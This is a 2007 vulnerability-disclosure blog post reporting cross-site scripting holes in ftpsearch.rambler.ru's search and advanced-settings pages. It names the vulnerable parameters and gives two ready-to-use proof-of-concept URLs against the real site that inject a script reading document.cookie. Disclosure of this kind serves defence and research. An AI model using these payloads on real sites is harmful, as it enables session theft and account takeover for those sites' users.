MOSEB-09 Bonus: Vulnerabilities at ftpsearch.rambler.ru
22:57 09.06.2007New bonus vulnerabilities at Rambler. These Cross-Site Scripting holes I found 01.06.2007. I found them when I looked for another holes for the project, after Rambler untimely fixed some that I prepared. Rambler need to behave itself properly (when participating in the project).
The holes at Rambler-FTP (ftpsearch.rambler.ru) in search results and advanced settings. And these are XSS vulnerabilities like in MOSEB-09: Vulnerabilities at Rambler (total 12 new holes).
Search results (search.html).
XSS:
- alert(document.cookie)
- alert(document.cookie)
- alert(document.cookie)
- alert(document.cookie)
- alert(document.cookie)
- redirector
- html injection
The vulnerabilities are in words, ftype, form, what and sort1 parameters:
http://ftpsearch.rambler.ru/db/ftpsearch/search.html?words=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Advanced settings (advanced.html).
XSS:
- alert(document.cookie)
- alert(document.cookie)
- alert(document.cookie)
- alert(document.cookie)
- alert(document.cookie)
- alert(document.cookie)
- alert(document.cookie)
- redirector
- html injection
The vulnerabilities are in words, pflx, pfli, dflx, dfli, sl and sh parameters:
http://ftpsearch.rambler.ru/db/ftpsearch/advanced.html?words=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Moral: searching on ftp can be dangerous.
Середа, 15:10 13.06.2007
Thanks!
Середа, 16:38 13.06.2007
Alex
You are welcome.